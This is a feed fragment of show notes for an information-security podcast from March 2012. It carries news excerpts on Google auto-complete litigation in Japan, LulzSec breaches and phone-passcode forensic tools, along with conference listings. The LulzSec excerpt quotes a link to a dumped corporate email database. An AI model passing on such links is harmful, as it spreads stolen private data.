<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There will be a shift in behaviour and trust will be earned through experiences. But we&#39;ll do it because this will make our lives easier. We won&#39;t have to have five different things in our pockets because everything will be on the mobile: how we switch on our car, how we open our house, how we control our home systems.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcmag.com/article2/0,2817,2402077,00.asp"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcmag.com/article2/0,2817,2402077,00.asp</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One familiar Google search feature known as auto-complete has put the company in hot water with the Japanese legal system.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to The Japan Times, a Tokyo District Court has</span><a href="http://www.japantimes.co.jp/text/nn20120326a2.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> approved a petition</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> requesting that Google halt its auto-complete feature. The petition against Google was filed by a Japanese man who claims the feature breached his privacy and eventually led to the loss of his job. According to the man, whose name has been withheld, when his name is typed into the Google search engine auto-complete suggests words associated with criminal behavior. And when those suggested searches are clicked, over 10,000 results are shown that disparage or defame him. According to the plaintiff, this negative Google footprint has prevented him from finding employment since his initial firing several years ago.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The man&#39;s lawyer, Hiroyuki Tomita, told the paper, &quot;It could lead to irretrievable damage, such as job loss or bankruptcy, just by displaying search results that constitute defamation or violation of the privacy of an individual person or small and medium-size companies&hellip; It is necessary to establish a measure to enable swift redress for damage in the event of a clear breach.&quot; According to the plaintiff, when contacted last October about the matter, Google refused to remove the words because they were mechanically generated word suggestions.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.zdnet.com/blog/security/lulzsec-hacks-css-corp/11108"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/security/lulzsec-hacks-css-corp/11108</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lulz Security (LulzSec), a hacktivist group loosely associated with the hacktivist group Anonymous, returned last night after disbanding back in June 2011. Their first target was Military Singles, a dating website which the group hacked and from which it subsequently exposed 170,937 accounts. Soon after, the group targeted communications technology firm CSS Corp, and publicly posted the company&rsquo;s entire e-mail database (66 files in total).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here&rsquo;s what the group wrote on</span><a href="http://pastebin.com/GJgLRWHn"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> PasteBin</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://csscorp.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://csscorp.com/</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Global Information &amp; Communication Technology Service</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Data base dumped:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Whole database: </span><a href="http://www.embedupload.com/?d=4DLXN2QXWG"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.embedupload.com/?d=4DLXN2QXWG</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As I wrote last night, it&rsquo;s still not clear if LulzSec plans to go on another 50-day hacking spree like the first time. This second hack, however, shows pretty clearly the group didn&rsquo;t hack Military Singles just to show they&rsquo;re still around. While this new LulzSec isn&rsquo;t exactly like the first group, it is definitely doing everything in the spirit of its predecessor.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There are likely more hacks to come, but there&rsquo;s no way to know how much more. Less than an hour ago, the group tweeted &ldquo;Join http://irc.anonops.com chan -&gt; #LulzSecReborn.&rdquo; Something tells me we can expect a lot more lulz in the next few days.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.forbes.com/sites/andygreenberg/2012/03/27/heres-how-law-enforcement-cracks-your-iphones-security-code-video/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.forbes.com/sites/andygreenberg/2012/03/27/heres-how-law-enforcement-cracks-your-iphones-security-code-video/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Set your iPhone to require a four-digit passcode, and it may keep your private information safe from the prying eyes of the taxi driver whose cab you forget it in. But if law enforcement is determined to see the data you&rsquo;ve stored on your smartphone, those four digits will slow down the process of accessing it by less than two minutes.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the video shows, a Micro Systemation application the firm calls XRY can quickly crack an iOS or Android phone&rsquo;s passcode, dump its data to a PC, decrypt it, and display information like the user&rsquo;s GPS location, files, call logs, contacts, messages, even a log of its keystrokes.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mike Dickinson, the firm&rsquo;s marketing director and the voice in the videos, says that the company sells products capable of accessing passcode-protected iOS and Android devices in over 60 countries. It supplies 98% of the U.K.&rsquo;s police departments, for instance, as well as many American police departments and the FBI. Its largest single customer is the U.S. military. &nbsp;&rdquo;When people aren&rsquo;t wearing uniforms, looking at mobile phones to identify people is quite helpful,&rdquo; Dickinson says by way of explanation.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-631-avg-privacy-cellphone-dataplease-no-auto-complete-lulzsec-and-phone-cracking/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3698/0/infosec-daily-podcast-episode-631.mp3" length="17452390" type="audio/mpeg" />
		<itunes:duration>0:36:19</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 631 for March 28, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1, 2012
	Where: Austin, Texas
[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 631 for March 28, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1, 2012
	Where: Austin, Texas
	http://www.Infosecsouthwest.com
&#160;
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://news.techworld.com/security/3347019/avg-adds-do-not-track-technology-antivirus/
AVG has become the first antivirus vendor to offer a privacy filter to monitor and block websites and ad networks that silently collect Internet usage data from consumers, the company has announced.
Available from today in a service pack for all paid and free AVG antivirus users, DoNotTrack is a plug-in for Internet Explorer, Mozilla and Chrome that keeps tabs on which sites are collecting data as users browse the web.
Some of this will be fairly innocent web analytics of the sort gathered by every site to monitor how visitors interact with sites, but AVG said users should also be more aware of social media applications that collected extensive data usage information and ad networks. Both of these could be intrusive in search of the information necessary to serve context-aware advertising, AVG said.
AVG users will be able to block or allow these on a case-by-case basis, controlling what data is tracked depending on their assessment of a particular site.
&#8220;When you visit a site a lot of data is being collected about you,&#8221; said AVG CTO, al Ben-Itzhak. &#8220;Our goal is to make you aware of what is being collected.&#8221;
The company had designed DoNotTrack as an &#8216;active&#8217; tracking system after noticing that the passive voluntary approach pioneered by World Wide Web Consortium (W3C) was often being ignored by providers, he said.
A good example of this is Mozilla&#39;s Boot to Gecko operating system for smartphones, which will include support for this approach. Longer run, Ben-Itzhak thought standardised efforts were the best approach to the privacy issue but would take time to mature.
&#8230;
Source: &#160;http://www.timescolonist.com/business/Cellphones+quickly+becoming+repository+owner+entire+identity+experts/6350403/story[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 630 &#8211; WasteWater Hacker, Supply Chain Tracking, Zeus Disruption, RDP DDoS Tool, Reborn LulzSec, and PirateBay Censoring</title>
		<link>http://www.isdpodcast.com/episode-630-wastewater-hacker-supply-chain-tracking-zeus-disruption-rdp-ddos-tool-reborn-lulzsec-and-piratebay-censoring</link>
		<comments>http://www.isdpodcast.com/episode-630-wastewater-hacker-supply-chain-tracking-zeus-disruption-rdp-ddos-tool-reborn-lulzsec-and-piratebay-censoring#comments</comments>
		<pubDate>Wed, 28 Mar 2012 00:53:50 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3693</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 630 for March 27, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris &#8220;The Best Around&#8221; Sverdlik, Karthik Rangarajan, and &#8220;the Great and Wonderful&#8221; Themson Mester. &#160; Announcements: InfoSec Southwest When: March 30-April 1, 2012 Where: Austin, Texas http://www.Infosecsouthwest.com &#160; Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 630 for March 27, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris &ldquo;The Best Around&rdquo; Sverdlik, Karthik Rangarajan, and &ldquo;the Great and Wonderful&rdquo; Themson Mester.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1, 2012<br class="kix-line-break" /><br />
	Where: Austin, Texas<br class="kix-line-break" /><br />
	</span><a href="http://www.infosecsouthwest.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA<br class="kix-line-break" /><br />
	</span><a href="http://www.outerz0ne.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
